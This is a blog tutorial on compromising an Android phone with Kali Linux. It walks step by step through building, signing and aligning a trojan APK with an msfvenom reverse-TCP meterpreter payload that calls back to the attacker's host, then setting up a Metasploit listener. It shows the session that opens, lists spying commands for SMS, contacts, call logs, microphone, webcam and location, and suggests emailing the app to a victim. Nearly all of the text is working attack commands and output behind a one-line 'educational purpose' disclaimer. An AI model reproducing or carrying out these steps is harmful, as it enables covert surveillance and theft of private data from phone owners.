Quick Guide: How To hack android with Kali Linux

admin

8 years ago

Categories: Kali Linux

Quick Guide: How To hack android with Kali Linux

In my earlier Post you we have learned how to hack windows using Kali Linux. This time we are going to hack android with Kali Linux. We are making use of msfvenom tool within Kali linux which is best combination of Msfpayload and Msfencode.

NOTE: This tutorial is for educational purpose only.

Prerequisite for Hack Android

Kali Linux
Android Phone : For demonstration purpose we have used Android emulator provided by Google.

Steps to hack Android

1. Create Payload

To create Trojan for the android hack we need to create payload using msfvenom utility with Kali linux.

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.202.128 LPORT=4444 R > /root/Desktop/my0704.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes

In the above command LHOST ip specified is used within the ifconfig command from Kali Linux.

The above command create trojan apk file which can be installed on the target phone to exploit , however before this we need to sign this apk for proper installation. Follow below list of steps for the same.

a. Create Keystore:

root@kali:~# keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000

Above command asks about the list of question and password.

b. Sign the created apk file using jarsigner.

root@kali:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/Desktop/my0704.apk app
Enter Passphrase for keystore:
adding: META-INF/APP.SF
adding: META-INF/APP.RSA
signing: classes.dex
signing: AndroidManifest.xml
signing: resources.arsc
jar signed.

Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.

c. Verify the apk created using jarsigner.

root@kali:~# jarsigner -verify -verbose -certs /root/Desktop/my0704.apk

d. Optimize the apk file using zipalign.

Before proceeding, install zipalign using command below:

apt-get install zipalign

Now lets optimize the apk.

root@kali:~# zipalign -v 4 /root/Desktop/my0704.apk /root/Desktop/my0704_sign.apk
Verifying alignment of /root/Desktop/my0704_sign.apk (4)...
50 META-INF/MANIFEST.MF (OK - compressed)
281 META-INF/APP.SF (OK - compressed)
623 META-INF/APP.RSA (OK - compressed)
1752 META-INF/ (OK)
1802 META-INF/SIGNFILE.SF (OK - compressed)
2087 META-INF/SIGNFILE.RSA (OK - compressed)
2750 classes.dex (OK - compressed)
8726 AndroidManifest.xml (OK - compressed)
10443 resources.arsc (OK - compressed)
Verification successful

So our final apk which we are using to hack android is named as “my0704_sign.apk”.

2. Start the msfconsole on Kali Linux for exploiting the android phone.

root@kali:~# msfconsole

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.com


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

In the above msf prompt launch the android payload and multi handler exploit using commands below:

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) >

In the command below we are using Kali linux ip for exploit can be taken from ifconfig command on Kali Linux. Also we are using port number 4444 for exploit.

msf exploit(handler) > set LHOST 192.168.202.128
LHOST => 192.168.202.128
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) >

And then give finally exploit command which will wait till execution of apk on the android phone.

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.202.128:4444
[*] Starting the payload handler...

Execution of apk on android.

Here we are using the Android emulator provided by Google. Hence you need to download the ISO image from this website.

Once downloaded you can create normal virtual machine in vmware and mount this iso on vm to start the vm machine. Setup android vm using your gmail id.

In real scenario you can write E-mail to victim to download the app and installation. In our case we are uploading the apk on vm and installing it.

Once installed and open the app “Main Activity”.

Upon opening the app we will get the meterpreter session on our kali linux as below:

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.202.128:4444
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.202.129
[*] Meterpreter session 1 opened (192.168.202.128:4444 -> 192.168.202.129:48620) at 2017-04-05 21:37:50 +0000

meterpreter >

Just type sysinfo command at the meterpreter prompt to get the details about the phone.

meterpreter > sysinfo
Computer : localhost
OS : Android 4.3 - Linux 3.10.2-android-x86+ (i686)
Meterpreter : java/android
meterpreter >

You can use below list of commands to hack android. Description is self explanatory. Also you can use help command at the meterpreter prompt for details about it.

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wlan_geolocate    Get current lat-long using WLAN information

How to setup linux iSCSI target initiator on RHEL7 for Storage allocation »

« How To access linux remote desktop session using VNC

View Comments (2)

stuntfamz says:

February 5, 2019 at 3:51 pm

the session just ends after less than 10 seconds , how can i solve this issue
noone says:

July 25, 2019 at 8:45 am

how to install jarsigner in kali linux lite